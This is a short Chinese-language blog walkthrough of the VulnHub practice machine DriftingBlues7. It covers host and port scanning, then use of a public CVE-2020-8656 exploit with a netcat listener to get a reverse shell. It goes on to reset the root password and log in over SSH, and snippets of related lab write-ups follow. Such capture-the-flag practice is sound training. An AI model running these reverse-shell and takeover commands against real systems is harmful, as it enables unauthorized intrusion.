首页 > 其他分享 >vulnhub靶机:driftingblues7

vulnhub靶机:driftingblues7

时间:2024-03-05 12:01:11浏览次数:20  
标签:eonrce 10.9 driftingblues7 端口 vulnhub https 23.93 靶机

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

kali的ip:10.9.23.112

靶机ip:10.9.23.93

2:端口扫描

nmap -A -p- -T4 10.9.23.93

开放了22,66,80,443,3306端口

3:端口探测

访问66端口,因为是上面运行了SimpleHttpServer

访问80端口,发现一个登录界面,来百度搜索Eyes of network发现可以利用的exp

漏洞编号

CVE-2020-8656

找到一个可以利用的漏洞克隆到kali

https://github.com/h4knet/eonrce

git clone https://github.com/h4knet/eonrce.git

二:渗透测试

赋予执行权限

chmod +x eonrce.py

在Kali 开启监听

nc -lvvp 6666

运行脚本:

./eonrce.py https://10.9.23.93 -ip 10.9.23.112 -port 6666

修改root的密码passwd root

由之前扫描发现开了ssh服务,我们用 ssh 连接靶机

ssh 10.9.23.93

发现最后flag

标签:eonrce,10.9,driftingblues7,端口,vulnhub,https,23.93,靶机
From: https://www.cnblogs.com/woaishuaidan/p/18053701

相关文章

  • vulnhub靶机分配不到ip详细解决方法
    一:vmwore修改系统配置1:ro修改成rwsingleinit=/bin/bash2:ctrl+x进入bash3:IPa查看它属于哪块网卡4:vi/etc/network/interfaces进入网卡配置信息将auto和iface后的网卡改回来5:重启服务/etc/init.d/networkingrestart6:IPa就可以看到获取成功重启即可二:virtubox最终......
  • vulnhub靶机:dc-2
    一:主机发现arp-scan-Ieth010.4.7.0/24kaliip:10.4.7.128靶机IP:10.4.7.151二:端口扫描nmap-T4-sV-p--A10.4.7.151三:信息收集无法访问更改host文件vim/etc/hosts通过flag1的提示,我们需要使用cewl爆破出用户名和密码,因为他用wordpress框架搭建,我们先使用wpsca......
  • vulnhub靶机:dc-1
    一:信息收集1:主机发现arp-scan-Ieth010.4.7.0/24kali的IP:10.4.7.128靶机ip:10.4.7.1502:端口扫描nmap-T4-sV-p--A10.4.7.1503:信息收集启动Metersploit:msfconsole用search命令查找与Drupal有关的漏洞:searchdrupal选取2018的进行测试,因为有远程代码执行漏......
  • vulnhub靶机:doubletrouble
    一:信息收集1:主机发现2:端口扫描3:敏感目录探测二:渗透测试1:敏感目录扫到三个需要重点关注http://10.4.7.140/core发现该目录下存在很多敏感文件,其中有一个文件下有邮箱用户名和密码,应该是mysql数据库的用户名和密码http://10.4.7.140/uploads猜测该目录应该是登陆后上传......
  • vulnhub靶机:venus
    一:主机发现arp-scan-Ieth010.4.7.0/24二:端口扫描发现开放了22和8080端口三:敏感目录扫描四:渗透测试访问8080端口他说来宾用户可以登录我们找到一个/admin目录访问:http://10.4.7.142:8080/admin它将我们重定向到Django管理登录门户:http://10.4.7.142:8080/adm......
  • vulnhub靶机:thm-contain
    一:信息收集1:主机发现foriin{1..254};do(ping10.4.7.$i-c1-w5>/dev/null&&echo"10.4.7.$i"&);done2:扫描端口forportin{1..65535};doecho>/dev/tcp/10.4.7.134/$port&&echo"port$portisopen"done2>......
  • vulnhub靶机:cereal
    一:信息收集1:主机发现2:端口扫描3:敏感目录扫描二:外部信息1:先试试ftp登录nmap扫到的结果显示它支持匿名登录df4770f645f9ba25c8b90c55760e82950d6245c0ad78ce8ddcdbd6c4947b1da2没发现什么东西2:http登录发现一个域名cereal.ctf扫一下目录sudogobusterdir-uht......
  • vulnhub靶机:driftingblues-6
    一:主机发现arp-scan-Ieth010.9.23.0/24二:端口扫描nmap-T4-sV-p--A10.9.23.54内核3.2可能存在脏牛漏洞三:目录探测dirbhttp://10.9.23.54http://10.9.23.54/robots.txt10.9.23.54/textpattern/textpatternadd.zipextensiontoyourdir-brutehttp://10......
  • vulnhub靶机:driftingblues-4
    一:主机发现arp-scan-Ieth010.9.23.0/24二:端口扫描nmap-T4-sV-p--A10.9.23.195三:端口探测80端口产看源码,发现一串base64Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUU......
  • vulnhub靶机:driftingblues-2
    一:主机发现arp-scan-Ieth010.9.23.0/24二:端口扫描nmap-T4-sV-p--A10.9.23.50三:端口探测1:ftpftp可以实现匿名登录anonymousgetsecret.jpg得到一张图片先用steghide查看隐藏信息steghideextract-sfsecret.jpg需要密码所以尝试利用stegseek爆破stegs......